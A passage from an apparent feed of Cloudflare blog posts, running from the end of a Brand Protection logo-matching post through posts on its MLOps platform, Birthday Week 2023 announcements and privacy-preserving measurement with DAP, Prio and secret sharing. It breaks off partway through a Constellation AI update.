      Scan result retrieval
      
        
      
    
    As images undergo scanning, the API remains the conduit for result retrieval. Its role here is to constantly monitor and provide the results in real time. During scanning, the API ensures users receive timely updates. If scanning is still in progress, a “still scanning” status is communicated. Upon completion, the API is designed to relay crucial information — details on matches if found, or a simple “no matches” declaration.
            
            
            
            
            
    
      Storing and maintaining logo data
      
        
      
    
    In the background, we maintain a vectorized version of all user-uploaded logos when the user query is saved. This system, acting as a logo matching subscriber, is entrusted with the responsibility of ensuring accurate and up-to-date logo matching.
To accomplish this, two strategies come into play. Firstly, the subscriber stays attuned to revisions in the logo set. It saves vectorized logo sets with every revision and regular checks are conducted by the subscriber to ensure alignment between the vectorized logos and those saved in the database.
While monitoring the query, the subscriber employs a diff-based strategy. This recalibrates the vectorized logo set against the current logos stored in the database, ensuring a seamless transition into processing.
    
      Shaping the future of brand protection: our roadmap ahead
      
        
      
    
    With the introduction of the Logo Matching feature, Cloudflare’s Brand Protection suite advances to the next level of brand integrity management. By enabling you to detect and analyze, and act on unauthorized logo usage, we’re helping businesses to take better care of their brand identity.
At Cloudflare, we're committed to shaping a comprehensive brand protection solution that anticipates and mitigates risks proactively. In the future, we plan to add enhancements to our brand protection solution with features like automated cease and desist letters for swift legal action against unauthorized logo use, proactive domain monitoring upon onboarding, simplified reporting of brand impersonations and more.
    
      Getting started
      
        
      
    
    If you’re an Enterprise customer, sign up for Beta Access for Brand protection now to gain access to private scanning for your domains, logo matching, save queries and set up alerts on matched domains. Learn more about Brand Protection here. 


A look inside the Cloudflare ML Ops platform
Keith Adler — Thu, 07 Dec 2023 14:00:42 GMT
 
            
            
            
            
            
We've been relying on ML and AI for our core services like Web Application Firewall (WAF) since the early days of Cloudflare. Through this journey, we've learned many lessons about running AI deployments at scale, and all the tooling and processes necessary. We recently launched Workers AI to help abstract a lot of that away for inference, giving developers an easy way to leverage powerful models with just a few lines of code. In this post, we’re going to explore some of the lessons we’ve learned on the other side of the ML equation: training.
Cloudflare has extensive experience training models and using them to improve our products. A constantly-evolving ML model drives the WAF attack score that helps protect our customers from malicious payloads. Another evolving model powers our bot management product to catch and prevent bot attacks on our customers. Our customer support is augmented by data science. We build machine learning to identify threats with our global network. To top it all off, Cloudflare is delivering machine learning at unprecedented scale across our network.
Each of these products, along with many others, has elevated ML models — including experimentation, training, and deployment — to a crucial position within Cloudflare. To help our team continue to innovate efficiently, our MLOps effort has collaborated with Cloudflare’s data scientists to implement the following best practices.
    
      Notebooks
      
        
      
    
    Given a use case and data, the first step for many Data Scientist/AI Scientists is to set up an environment for exploring data, feature engineering, and model experiments. Jupyter Notebooks are a common tool to satisfy these requirements. These environments provide an easy remote Python environment that can be run in the browser or connected to a local code editor. To make notebooks scalable and open to collaboration, we deploy JupyterHub on Kubernetes. With JupyterHub, we can manage resources for teams of Data Scientists and ensure they get a suitable development environment. Each team can tailor their environment by pre-installing libraries and configuring user environments to meet the specific needs, or even individual projects.
This notebook space is always evolving as well. Open source projects include further features, such as:
nbdev - a Python package to improve the notebook experience
Kubeflow - the kubernetes native CNCF project for machine learning
deployKF - ML Platforms on any Kubernetes cluster, with centralized configs, in-place upgrades, and support for leading ML & Data tools like Kubeflow, Airflow, and MLflow
    
      GitOps
      
        
      
    
    Our goal is to provide an easy-to-use platform for Data Scientists and AI Scientists to develop and test machine learning models quickly. Hence, we are adopting GitOps as our continuous delivery strategy and infrastructure management on MLOps Platform in Cloudflare. GitOps is a software development methodology that leverages Git, a distributed version control system, as the single source of truth for defining and managing infrastructure, application configurations, and deployment processes. It aims to automate and streamline the deployment and management of applications and infrastructure in a declarative and auditable manner. GitOps aligns well with the principles of automation and collaboration, which are crucial for machine learning (ML) workflows. GitOps leverages Git repositories as the source of truth for declarative infrastructure and application code.
A data scientist needs to define the desired state of infrastructure and applications. This usually takes a lot of custom work, but with ArgoCD and model templates, all it takes is a simple pull request to add new applications. Helm charts and Kustomize are both supported to allow for configuration for different environments and jobs. With ArgoCD, declarative GitOps will then start the Continuous Delivery process. ArgoCD will continuously check the desired state of the infrastructure and applications to ensure that they are synched with the Git repository.
            
            
            
            
            
In the future, we plan to migrate our platform (including Jupyterhub) to Kubeflow, a machine learning workflow platform on Kubernetes that simplifies the development, deployment, and management of notebooks and end-to-end pipelines. This is best deployed using a new project, deployKF, which allows for distributed configuration management across multiple components available with Kubeflow, and others that extend beyond what is offered within Kubeflow.
    
      Templates
      
        
      
    
    Starting a project with the right tools and structure can be the difference between success and stagnation. Within Cloudflare, we've curated an array of model templates, which are production ready data science repositories with an example model. These model templates are deployed through production to continually ensure they are a stable foundation for future projects. To start a new project, all it takes is one Makefile command to build a new CICD project in the git project of the users’ choosing. These template utility packages are identical to those used in our Jupyter Notebooks and connections to R2 / S3 / GCS buckets, D1 / Postgres / Bigquery / Clickhouse databases. Data scientists can use these templates to instantly kickstart new projects with confidence. These templates are not yet publicly available, but our team plans to open source them in the future.
1. Training TemplateOur model training template provides a solid foundation to build any model. This is configured to help extract, transform, and load data (ETL) from any data source. The template includes helper functions for feature engineering, tracking experiments with model metadata, and choose orchestration through a Directed Acyclic Graph (DAG) to productionalize the model pipeline. Each orchestration can be configured to use Airflow or Argo Workflows.
2. Batch Inference TemplateBatch and micro-batch inference can make a significant impact on processing efficiency. Our batch inference model template to schedule models for consistent results, and can be configured to use Airflow or Argo Workflows.
3. Stream Inference TemplateThis template makes it easy for our team to deploy real-time inference. Tailored for Kubernetes as a microservice using FastAPI, this template allows our team to run inference using familiar Python in a container. This microservice already has built-in REST interactive documentation with Swagger and integration with Cloudflare Access authentication tokens in terraform.
4. Explainability TemplateOur model template for explainability spins up dashboards to illuminate the model type and experiments. It is important to be able to understand key values such as a time window F1 score, the drift of features and data over time. Tools like Streamlit and Bokeh help to make this possible.
    
      Orchestration
      
        
      
    
    Organizing data science into a consistent pipeline involves a lot of data and several model versions. Enter Directed Acyclic Graphs (DAGs), a robust flow chart orchestration paradigm that weaves together the steps from data to model, and model to inference. There are many unique approaches to running DAG pipelines, but we have found that data science teams' preference comes first. Each team has different approaches based on their use cases and experience.
Apache Airflow - The Standard DAG ComposerApache Airflow is the standard as a DAG (Directed Acyclic Graphs)-based orchestration approach. With a vast community and extensive plugin support, Airflow excels in handling diverse workflows. The flexibility to integrate with a multitude of systems and a web-based UI for task monitoring make it a popular choice for orchestrating complex sequences of tasks. Airflow can be used to run any data or machine learning workflow.
Argo Workflows - Kubernetes-native BrillianceBuilt for Kubernetes, Argo Workflows embraces the container ecosystem for orchestrating workflows. It boasts an intuitive YAML-based workflow definition and excels in running microservices-based workflows. The integration with Kubernetes enables scalability, reliability, and native container support, making it an excellent fit for organizations deeply rooted in the Kubernetes ecosystem. Argo Workflows can also be used to run any data or machine learning workflow.
Kubeflow Pipelines - A Platform for WorkflowsKubeflow Pipelines is a more specific approach tailored for orchestrating machine learning workflows. “KFP” aims to address the unique demands of data preparation, model training, and deployment in the ML landscape. As an integrated component of the Kubeflow ecosystem, it streamlines ML workflows with a focus on collaboration, reusability, and versioning. Its compatibility with Kubernetes ensures seamless integration and efficient orchestration.
Temporal - The Stateful Workflow EnablerTemporal takes a stance by emphasizing the orchestration of long-running, stateful workflows. This relative newcomer shines in managing resilient, event-driven applications, preserving workflow state and enabling efficient recovery from failures. The unique selling point lies in its ability to manage complex, stateful workflows, providing a durable and fault-tolerant orchestration solution.
In the orchestration landscape, the choice ultimately boils down to the team and use case. These are all open source projects, so the only limitation is support for different styles of work, which we find is worth the investment.
    
      Hardware
      
        
      
    
    Achieving optimal performance necessitates an understanding of workloads and the underlying use cases in order to provide teams with effective hardware. The goal is to enable data scientists and strike a balance between enablement and utilization. Each workload is different, and it is important to fine tune each use case for the capabilities of GPUs and CPUs to find the perfect tool for the job.  For core datacenter workloads and edge inference, GPUs have leveled up the speed and efficiency that is core to our business. With observability and metrics consumed by Prometheus, metrics enable us to track orchestration to be optimized for performance, maximize hardware utilization, and operate within a Kubernetes-native experience.
    
      Adoption
      
        
      
    
    Adoption is often one of the most challenging steps in the MLops journey. Before jumping into building, it is important to understand the different teams and their approach to data science. At Cloudflare, this process began years ago, when each of the teams started their own machine learning solutions separately. As these solutions evolved, we ran into the common challenge of working across the company to prevent work from becoming isolated from other teams. In addition, there were other teams that had potential for machine learning but did not have data science expertise within their team. This presented an opportunity for MLops to step in — both to help streamline and standardize the ML processes being employed by each team, and to introduce potential new projects to data science teams to start the ideation and discovery process.
When able, we have found the most success when we can help get projects started and shape the pipelines for success. Providing components for shared use such as notebooks, orchestration, data versioning (DVC), feature engineering (Feast), and model versioning (MLflow) allow for teams to collaborate directly.
    
      Looking forward
      
        
      
    
    There is no doubt that data science is evolving our business and the businesses of our customers. We improve our own products with models, and have built AI infrastructure that can help us secure applications and applications built with AI. We can leverage the power of our network to deliver AI for us and our customers. We have partnered with machine learning giants to make it easier for the data science community to deliver real value from data.
The call to action is this: join the Cloudflare community in bringing modern software practices and tools to data science. Be on the lookout for more data science from Cloudflare. Help us securely leverage data to help build a better Internet. 


Birthday Week recap: everything we announced — plus an AI-powered opportunity for startups
Dina Kozlov — Mon, 02 Oct 2023 13:00:24 GMT
 
            
            
            
            
            
This year, Cloudflare officially became a teenager, turning 13 years old. We celebrated this milestone with a series of announcements that benefit both our customers and the Internet community.
From developing applications in the age of AI to securing against the most advanced attacks that are yet to come, Cloudflare is proud to provide the tools that help our customers stay one step ahead.
We hope you’ve had a great time following along and for anyone looking for a recap of everything we launched this week, here it is:
    
      Monday
      
        
      
    
    What In a sentence…
Switching to Cloudflare can cut emissions by up to 96% Switching enterprise network services from on-prem to Cloudflare can cut related carbon emissions by up to 96%. 
Cloudflare Trace Use Cloudflare Trace to see which rules and settings are invoked when an HTTP request for your site goes through our network. 
Cloudflare Fonts Introducing Cloudflare Fonts. Enhance privacy and performance for websites using Google Fonts by loading fonts directly from the Cloudflare network. 
How Cloudflare intelligently routes traffic Technical deep dive that explains how Cloudflare uses machine learning to intelligently route traffic through our vast network. 
Low Latency Live Streaming Cloudflare Stream’s LL-HLS support is now in open beta. You can deliver video to your audience faster, reducing the latency a viewer may experience on their player to as little as 3 seconds. 
Account permissions for all Cloudflare account permissions are now available to all customers, not just Enterprise. In addition, we’ll show you how you can use them and best practices. 
Incident Alerts Customers can subscribe to Cloudflare Incident Alerts and choose when to get notified based on affected products and level of impact. 
    
      Tuesday
      
        
      
    
    What In a sentence…
Welcome to the connectivity cloud Cloudflare is the world’s first connectivity cloud — the modern way to connect and protect your cloud, networks, applications and users. 
Amazon’s $2bn IPv4 tax — and how you can avoid paying it  Amazon will begin taxing their customers $43 for IPv4 addresses, so Cloudflare will give those \$43 back in the form of credits to bypass that tax. 
Sippy

Minimize egress fees by using Sippy to incrementally migrate your data from AWS to R2. 
Cloudflare Images All Image Resizing features will be available under Cloudflare Images and we’re simplifying pricing to make it more predictable and reliable.  
Traffic anomalies and notifications with Cloudflare Radar Cloudflare Radar will be publishing anomalous traffic events for countries and Autonomous Systems (ASes).
Detecting Internet outages Deep dive into how Cloudflare detects Internet outages, the challenges that come with it, and our approach to overcome these problems. 
    
      Wednesday
      
        
      
    
    What In a sentence…
The best place on Region: Earth for inference Now available: Workers AI, a serverless GPU cloud for AI, Vectorize so you can build your own vector databases, and AI Gateway to help manage costs and observability of your AI applications. 

Cloudflare delivers the best infrastructure for next-gen AI applications, supported by partnerships with NVIDIA, Microsoft, Hugging Face, Databricks, and Meta.
Workers AI  Launching Workers AI — AI inference as a service platform, empowering developers to run AI models with just a few lines of code, all powered by our global network of GPUs. 
Partnering with Hugging Face  Cloudflare is partnering with Hugging Face to make AI models more accessible and affordable to users. 
Vectorize Cloudflare’s vector database, designed to allow engineers to build full-stack, AI-powered applications entirely on Cloudflare's global network — available in Beta. 
AI Gateway AI Gateway helps developers have greater control and visibility in their AI apps, so that you can focus on building without worrying about observability, reliability, and scaling. AI Gateway handles the things that nearly all AI applications need, saving you engineering time so you can focus on what you're building.

 
You can now use WebGPU in Cloudflare Workers Developers can now use WebGPU in Cloudflare Workers. Learn more about why WebGPUs are important, why we’re offering them to customers, and what’s next. 
What AI companies are building with Cloudflare Many AI companies are using Cloudflare to build next generation applications. Learn more about what they’re building and how Cloudflare is helping them on their journey. 
Writing poems using LLama 2 on Workers AI Want to write a poem using AI? Learn how to run your own AI chatbot in 14 lines of code, running on Cloudflare’s global network. 
    
      Thursday
      
        
      
    
    What In a sentence…
Hyperdrive Cloudflare launches a new product, Hyperdrive, that makes existing regional databases much faster by dramatically speeding up queries that are made from Cloudflare Workers.
D1 Open Beta D1 is now in open beta, and the theme is “scale”: with higher per-database storage limits and the ability to create more databases, we’re unlocking the ability for developers to build production-scale applications on D1.
Pages Build Caching Build cache is a feature designed to reduce your build times by caching and reusing previously computed project components — now available in Beta. 
Running serverless Puppeteer with Workers and Durable Objects Introducing the Browser Rendering API, which enables developers to utilize the Puppeteer browser automation library within Workers, eliminating the need for serverless browser automation system setup and maintenance
Cloudflare partners with Microsoft to power their Edge Secure Network We partnered with Microsoft Edge to provide a fast and secure VPN, right in the browser. Users don’t have to install anything new or understand complex concepts to get the latest in network-level privacy: Edge Secure Network VPN is available on the latest consumer version of Microsoft Edge in most markets, and automatically comes with 5GB of data. 
Re-introducing the Cloudflare Workers playground We are revamping the playground that demonstrates the power of Workers, along with new development tooling, and the ability to share your playground code and deploy instantly to Cloudflare’s global network
Cloudflare integrations marketplace expands Introducing the newest additions to Cloudflare’s Integration Marketplace. Now available: Sentry, Momento and Turso. 
A Socket API that works across Javascript runtimes — announcing WinterCG spec and polyfill for connect() Engineers from Cloudflare and Vercel have published a draft specification of the connect() sockets API for review by the community, along with a Node.js compatible polyfill for the connect() API that developers can start using.
New Workers pricing Announcing new pricing for Cloudflare Workers, where you are billed based on CPU time, and never for the idle time that your Worker spends waiting on network requests and other I/O.
    
      Friday
      
        
      
    
    What In a sentence…
Post Quantum Cryptography goes GA  Cloudflare is rolling out post-quantum cryptography support to customers, services, and internal systems to proactively protect against advanced attacks. 
Encrypted Client Hello Announcing a contribution that helps improve privacy for everyone on the Internet. Encrypted Client Hello, a new standard that prevents networks from snooping on which websites a user is visiting, is now available on all Cloudflare plans. 
Email Retro Scan  Cloudflare customers can now scan messages within their Office 365 Inboxes for threats. The Retro Scan will let you look back seven days to see what threats your current email security tool has missed. 
Turnstile is Generally Available Turnstile, Cloudflare’s CAPTCHA replacement, is now generally available and available for free to everyone and includes unlimited use. 
AI crawler bots Any Cloudflare user, on any plan, can choose specific categories of bots that they want to allow or block, including AI crawlers. We are also recommending a new standard to robots.txt that will make it easier for websites to clearly direct how AI bots can and can’t crawl.

Detecting zero-days before zero-day Deep dive into Cloudflare’s approach and ongoing research into detecting novel web attack vectors in our WAF before they are seen by a security researcher. 
Privacy Preserving Metrics Deep dive into the fundamental concepts behind the Distributed Aggregation Protocol (DAP) protocol with examples on how we’ve implemented it into Daphne, our open source aggregator server. 
Post-quantum cryptography to origin We are rolling out post-quantum cryptography support for outbound connections to origins and Cloudflare Workers fetch() calls. Learn more about what we enabled, how we rolled it out in a safe manner, and how you can add support to your origin server today. 
Network performance update Cloudflare’s updated benchmark results regarding network performance plus a dive into the tools and processes that we use to monitor and improve our network performance. 
    
      One More Thing
      
        
      
    
    
            
            
            
            
            
When Cloudflare turned 12 last year, we announced the Workers Launchpad Funding Program - you can think of it like a startup accelerator program for companies building on Cloudlare’s Developer Platform, with no restrictions on your size, stage, or geography.
A refresher on how the Launchpad works: Each quarter, we admit a group of startups who then get access to a wide range of technical advice, mentorship, and fundraising opportunities. That includes our Founders Bootcamp, Open Office Hours with our Solution Architects, and Demo Day. Those who are ready to fundraise will also be connected to our community of 40+ leading global Venture Capital firms.
In exchange, we just ask for your honest feedback. We want to know what works, what doesn’t and what you need us to build for you. We don’t ask for a stake in your company, and we don’t ask you to pay to be a part of the program.
Targum (my startup) was one of the first AI companies (w/ @jamdotdev ) in the Cloudflare workers launchpad!
In return to tons of stuff we got from CF 🙏 they asked for feedback, and my main one was, let me do everything end to end on CF, I don't want to rent GPU servers… https://t.co/0j2ZymXpsL
— Alex Volkov (@altryne) September 27, 2023
Over the past year, we’ve received applications from nearly 60 different countries. We’ve had a chance to work closely with 50 amazing early and growth-stage startups admitted into the first two cohorts, and have grown our VC partner community to 40+ firms and more than $2 billion in potential investments in startups building on Cloudflare.
Next up: Cohort #3! Between recently wrapping up Cohort #2 (check out their Demo Day!), celebrating the Launchpad’s 1st birthday, and the heaps of announcements we made last week, we thought that everyone could use a little extra time to catch up on all the news - which is why we are extending the deadline for Cohort #3 a few weeks to October 13, 2023. AND we’re reserving 5 spots in the class for those who are already using any of last Wednesday’s AI announcements. Just be sure to mention what you’re using in your application.
So once you’ve had a chance to check out the announcements and pour yourself a cup of coffee, check out the Workers Launchpad. Applying is a breeze — you’ll be done long before your coffee gets cold.
    
      Until next time
      
        
      
    
    That’s all for Birthday Week 2023. We hope you enjoyed the ride, and we’ll see you at our next innovation week!
i hate @Cloudflare launch week
most launch weeks are underwhelming
cloudflare always makes me rethink everything i’m doing
— Dax (@thdxr) September 29, 2023
 


Privacy-preserving measurement and machine learning
Christopher Patton — Fri, 29 Sep 2023 13:00:45 GMT
 
In 2023, data-driven approaches to making decisions are the norm. We use data for everything from analyzing x-rays to translating thousands of languages to directing autonomous cars. However, when it comes to building these systems, the conventional approach has been to collect as much data as possible, and worry about privacy as an afterthought.
The problem is, data can be sensitive and used to identify individuals – even when explicit identifiers are removed or noise is added.
Cloudflare Research has been interested in exploring different approaches to this question: is there a truly private way to perform data collection, especially for some of the most sensitive (but incredibly useful!) technology?
Some of the use cases we’re thinking about include: training federated machine learning models for predictive keyboards without collecting every user’s keystrokes; performing a census without storing data about individuals’ responses; providing healthcare authorities with data about COVID-19 exposures without tracking peoples’ locations en masse; figuring out the most common errors browsers are experiencing without reporting which websites are visiting.  
It’s with those use cases in mind that we’ve been participating in the Privacy Preserving Measurement working group at the IETF whose goal is to develop systems for collecting and using this data while minimizing the amount of per-user information exposed to the data collector.
So far, the most promising standard in this space is DAP – Distributed Aggregation Protocol – a clever way to use multi-party computation to aggregate data without exposing individual measurements. Early versions of the algorithms used by DAP have been implemented by Google and Apple for exposure notifications.
In this blog post, we’ll do a deep dive into the fundamental concepts behind the DAP protocol and give an example of how we’ve implemented it into Daphne, our open source aggregator server. We hope this will inspire others to collaborate with us and get involved in this space!
    
      The principles behind DAP, an open standard for privacy preserving measurement
      
        
      
    
    
            
            
            
            
            
At a high level, using the DAP protocol forces us to think in terms of data minimization: collect only the data that we use and nothing more. Abstractly, our goal is to devise a system with which a data collector can compute some function \( f(m_{1},...,m_{N}) \) of measurements \( m_{1},...,m_{N} \) uploaded by users without observing the measurements in the clear.
            
            
            
            
            
Alice wants to know some aggregate statistic – like the average salary of the people at the party – without knowing how much each individual person makes.
This may at first seem like an impossible task: to compute on data without knowing the data we're computing on. Nevertheless, —and, as is often the case in cryptography— once we've properly constrained the problem, solutions begin to emerge.
            
            
            
            
            
Strawperson solution: delegate the calculation to a trusted third party, Bob. The problem with this is that Bob can see the private inputs in the clear
In an ideal world (see above), there would be some server somewhere on the Internet that we could trust to consume measurements, aggregate them, and send the result to the data collector without ever disclosing anything else. However, in reality there's no reason for users to trust such a server more than the data collector; Indeed, both are subject to the usual assortment of attacks that can lead to a data breach.
            
            
            
            
            
_MPC solution: secret-share the inputs across multiple parties, a.k.a. Bob and Daphne. If at least one person is honest, Alice gets the aggregate result without anyone knowing individual inputs in the clear._‌ ‌
Instead, what we do in DAP is distribute the computation across the servers such that no single server has a complete measurement. The key idea that makes this possible is secret sharing.
    
      Computing on secret shared data
      
        
      
    
    To set things up, let's make the problem a little more concrete. Suppose each measurement \( m_{i} \) is a number and our goal is to compute the sum of the measurements. That is, \( f(m_{1},...,m_{N}) = m_{1} + \cdots + m_{N} \). Our goal is to use secret sharing to allow two servers, which we'll call aggregators, to jointly compute this sum.
To understand secret sharing, we're going to need a tiny bit of math—modular arithmetic. The expression \(  X + Y  (\textrm{mod})  \textit{q} \) means "add \(  X  \) and \(  Y  \), then divide the sum by \(  q  \) and return the remainder". For now the modulus \(  q  \) can be any large number, as long as it's larger than any sum we'd ever want to compute (\(  2 ^{64}  \), say). In the remainder of this section, we'll omit \(  q  \) and simply write \(  X  + Y \) for addition modulo \(  q  \).
The goal of secret sharing is to shard a measurement (i.e., a "secret") into two "shares" such that (i) the measurement can be recovered by combining the shares together and (ii) neither share leaks any information about the measurement. To secret share each \(  m_{i} \), we choose a random number \( R_{i} \in \lbrace  0,...,q - 1\rbrace \), set the first share to be \(X_{i} = m_{i} - R_{i} \) and set the other share to be \( Y_{i} = R_{i} \). To recover the measurement, we simply add the shares together. This works because \( X_{i} + Y_{i} = (m_{i} - R_{i}) + R_{i} = m_{i} \). Moreover, each share is indistinguishable from a random number: For example, \( 1337 \) might be secret-shared into \( 11419752798245067454 \) and \( 7026991275464485499 \) (modulo \( q = 2^{64} \)).
With this scheme we can devise a simple protocol for securely computing the sum:
Each client shards its measurement \( m_{i} \) into \( X_{i} \) and \( Y_{i} \) and sends one share to each server.
The first aggregator computes \( X = X_{1} + \cdots + X_{N} \) and reveals \( X \) to the data collector. The second aggregator computes \( Y = Y_{1} + \cdots + Y_{N} \) and reveals \( Y \) to the data collector.
The data collector unshards the result as \( r = X + Y \).
This works because the secret shares are additive, and the order in which we add things up is irrelevant to the function we're computing:
\( r = m_{1} + \cdots + m_{N} \) // by definition\( r = (m_{1} - R_{1}) + R_{1} + \cdots (m_{N} - R_{N}) + R_{N} \) // apply sharding\( r = (m_{1} - R_{1}) + \cdots + (m_{N} - R_{N}) + R_{1} + \cdots R_{N} \) // rearrange the sum\( r = X + Y \) // apply aggregation
    
      Rich data types
      
        
      
    
    This basic template for secure aggregation was described in a paper from Henry Corrigan-Gibbs and Dan Boneh called "Prio: Private, Robust, and Scalable Computation of Aggregate Statistics" (NSDI 2017). This paper is a critical milestone in DAP's history, as it showed that a wide variety of aggregation tasks (not just sums) can be solved within one, simple protocol framework, Prio. With DAP, our goal in large part is to bring this framework to life.
All Prio tasks are instances of the same template. Measurements are encoded in a form that allows the aggregation function to be expressed as the sum of (shares of) the encoded measurements. For example:
To get arithmetic mean, we just divide the sum by the number of measurements.
Variance and standard deviation can be expressed as a linear function of the sum and the sum of squares (i.e., \( m_{i}, m_{i}^{2} \) for each \( i \)).
Quantiles (e.g., median) can be estimated reasonably well by mapping the measurements into buckets and aggregating the histogram.
Linear regression (i.e., finding a line of best fit through a set of data points) is a bit more complicated, but can also be expressed in the Prio framework.
This degree of flexibility is essential for wide-spread adoption because it allows us to get the most value we can out of a relatively small amount of software. However, there are a couple problems we still need to overcome, both of which entail the need for some form of interaction.
    
      Input validation
      
        
      
    
    The first problem is input validation. Software engineers, especially those of us who operate web services, know in our bones that validating inputs we get from clients is of paramount importance. (Never, ever stick a raw input you got from a client into an SQL query!) But if the inputs are secret shared, then there is no way for an aggregator to discern even a single bit of the measurement, let alone check that it has an expected value. (A secret share of a valid measurement and a number sampled randomly from \( \lbrace 0,...,q - 1 \rbrace \) look identical.) At least, not on its own.
The solution adopted by Prio (and the standard, with some improvements), is a special kind of zero-knowledge proof (ZKP) system designed to operate on secret shared data. The goal is for a prover to convince a verifier that a statement about some data it has committed to is true (e.g., the user has a valid hardware key), without revealing the data itself (e.g. which hardware key is in-use).
Our setting is exactly the same, except that we're working on secret-shared data rather than committed data. Along with the measurement shares, the client sends shares of a validity proof; then during aggregation, the aggregators interact with one another in order to check and verify the proof. (One round-trip over the network is required.)
A happy consequence of working with secret shared data is that proof generation and verification are much faster than for committed (or encrypted) data. This is mainly because we avoid the use of public-key cryptography (i.e., elliptic curves) and are less constrained in how we choose cryptographic parameters. (We require the modulus \( q \) to be a prime number with a particular structure, but such primes are not hard to find.)
    
      Non-linear aggregation
      
        
      
    
    There are a variety of aggregation tasks for which Prio is not well-suited, in particular those that are non-linear. One such task is to find the "heavy hitters" among the set of measurements. The heavy hitters are the subset of the measurements that occur most frequently, say at least \( t \) times for some threshold \( t \). For example, the measurements might be the URLs visited on a given day by users of a web browser; the heavy hitters would be the set of URLs that were visited by at least \( t \) users.
This computation can be expressed as a simple program:
            def heavy_hitters(measurements: list[bytes], t: int) -> set[bytes]:
    hh = defaultdict(lambda: 0)
    for measurement in measurements:
        hh[measurement] += 1
    return set(map(lambda x: x[0], filter(lambda x: x[1] >= t, hh.items())))
            However, it cannot be expressed as a linear function, at least not efficiently (with sub-exponential space). This would be required to perform this computation on secret-shared measurements.
In order to enable non-linear computation on secret shared data, it is necessary to introduce some form of interaction. There are a few possibilities. For the heavy hitters problem in particular, Henry Corrigan-Gibbs and others devised a protocol called Poplar (IEEE Security & Privacy 2021) in which several rounds of aggregation and unsharding are performed, where in each round, information provided by the collector is used to "query" the measurements to obtain a refined aggregate result.
    
      Helping to build a world of multi-party computation
      
        
      
    
    Protocols like Prio or Poplar that enable computation over secret shared data fit into a rich tradition in cryptography known as multi-party computation (MPC). MPC is at once an active research area in theoretical computer science and a class of protocols that are beginning to see real-world use—in our case, to minimize the amount of privacy-sensitive information we collect in order to keep the Internet moving.
The PPM working group at IETF represents a significant effort, by Cloudflare and others, to standardize MPC techniques for privacy preserving measurement. This work has three main prongs:
To identify the types of problems that need to be solved.
To provide cryptography researchers from academia, industry, and the public sector with "templates" for solutions that we know how to deploy. One such template is called a "Verifiable Distributed Aggregation Function (VDAF)", which specifies a kind of "API boundary" between protocols like Prio and Poplar and the systems that are built around them. Cloudflare Research is leading development of the standard, contributing to implementations, and providing security analysis.
To provide a deployment roadmap for emerging protocols. DAP is one such roadmap: it specifies execution of a generic VDAF over HTTPS and attends to the various operational considerations that arise as deployments progress. As well as contributing to the standard itself, Cloudflare has developed its own implementation designed for our own infrastructure (see below).
The IETF is working on its first set of drafts (DAP/VDAF). These drafts are mature enough to deploy, and a number of deployments are scaling up as we speak. Our hope is that we have initiated positive feedback between theorists and practitioners: as new cryptographic techniques emerge, more practitioners will begin to work with them, which will lead to identifying new problems to solve, leading to new techniques, and so on.
    
      Daphne: Cloudflare’s implementation of a DAP Aggregation Server
      
        
      
    
    Our emerging technology group has been working on Daphne, our Rust-based implementation of a DAP aggregator server. This is only half of a deployment – DAP architecture requires two aggregator servers to interoperate, both operated by different parties. Our current version only implements the DAP Helper role; the other role is the DAP Leader. Plans are in the works to implement the Leader as well, which will open us up to deploy Daphne for more use cases.
We made two big decisions in our implementation here: using Rust and using Workers. Rust has been skyrocketing in popularity in the past few years due to its performance and memory management – a favorite of cryptographers for similar reasons. Workers is Cloudflare’s serverless execution environment that allows developers to easily deploy applications globally across our network – making it a favorite tool to prototype with at Cloudflare. This allows for easy integration with our Workers-based storage solutions like: Durable Objects, which we’re using for storing various data artifacts as required by the DAP protocol; and KV, which we’re using for managing aggregation task configuration. We’ve learned a lot from our interop tests and deployment, which has helped improve our own Workers products and which we have also fed back into the PPM working group to help improve the DAP standard.
If you’re interested in learning more about Daphne or collaborating with us in this space, you can fill out this form. If you’d like to get involved in the DAP standard, you can check out the working group. 


Globally distributed AI and a Constellation update
Rita Kozlov — Thu, 22 Jun 2023 13:00:05 GMT
 
            
            
            
            
            
During Cloudflare's 2023 Developer Week, we announced Constellation, a set of APIs that allow everyone to run fast, low-latency inference tasks using pre-trained machine learning/AI models, directly on Cloudflare’s network.
    
      Constellation update
      
        
      
    
    We now have a few thousand accounts onboarded in the Constellation private beta and have been listening to our customer's feedback to evolve and improve the platform. Today, one month after the announcement, we are upgrading Constellation with three new features:
Bigger modelsWe are increasing the size limit of your models from 10 MB to 50 MB. While still somewhat conservative during the private beta, this new limit opens doors to more pre-trained and optimized models you can use with Constellation.
Tensor cachingWhen you run a Constellation inference task, you pass multiple tensor objects as inputs, sometimes creating big data payloads. These inputs travel through the wire protocol back and forth when you repeat the same task, even when the input changes from multiple runs are minimal, creating unnecessary network and data parsing overhead.
The client API now supports caching input tensors resulting in even better network latency and faster inference times.
XGBoost runtimeConstellation started with the ONNX runtime, but our vision is to support multiple runtimes under a common API. Today we're adding the XGBoost runtime to the list.
XGBoost is an optimized distributed gradient boosting library designed to be highly efficient, flexible, and portable, and it's known for its performance in structured and tabular data tasks.
You can start uploading and using XGBoost models today.
            
            
            
            
            
You can find the updated documentation with these new features and an example on how to use the XGBoost runtime with Constellation in our Developers Documentation.
    
      An era of globally distributed AI
      
        
      
    
    Since Cloudflare’s network is globally distributed, Constellation is our first public release of globally distributed machine learning.
But what does this mean? You may not think of a global network as the place to deploy your machine learning tasks, but machine learning has been a core part of what’s enabled much of Cloudflare’s core functionality for many years. And we run it across our global network in 300 cities.
Is this large spike in traffic an attack or a Black Friday sale? What’s going to be the best way to route this request based on current traffic patterns? Is this request coming from a human or a bot? Is this HTTP traffic a zero-day? Being able to answer these questions using automated machine learning and AI, rather than human intervention, is one of the things that’s enabled Cloudflare to scale.
But this is just a small sample of what globally distributed machine learning enables. The reason this was so helpful for us was because we were able to run this machine learning as an integrated part of our stack, which is why we’re now in the process of opening it up to more and more developers with Constellation.
As Michelle Zatlyn, our co-founder likes to say, we’re just getting started (in this space) — every day we’re adding hundreds of new users to our Constellation beta, testing out and globally deploying new models, and beyond that, deploying new hardware to support the new types of workloads that AI will bring to the our global network.
With that, we wanted to share a few announcements and some use cases that help illustrate why we’re so excited about globally distributed AI. And since it’s Speed Week, it should be no surprise that, well, speed is at the crux of it all.
    
      Custom tailored web experiences, powered by AI
      
        
      
    
    We’ve long known about the importance of performance when it comes to web experiences — in e-commerce, every second of page load time can have as much as a 7% drop off effect on conversion. But being fast is not enough. It’s necessary, but not sufficient. You also have to be accurate.
That is, rather than serving one-size-fits-all experiences, users have come to expect that you know what they want before they do.
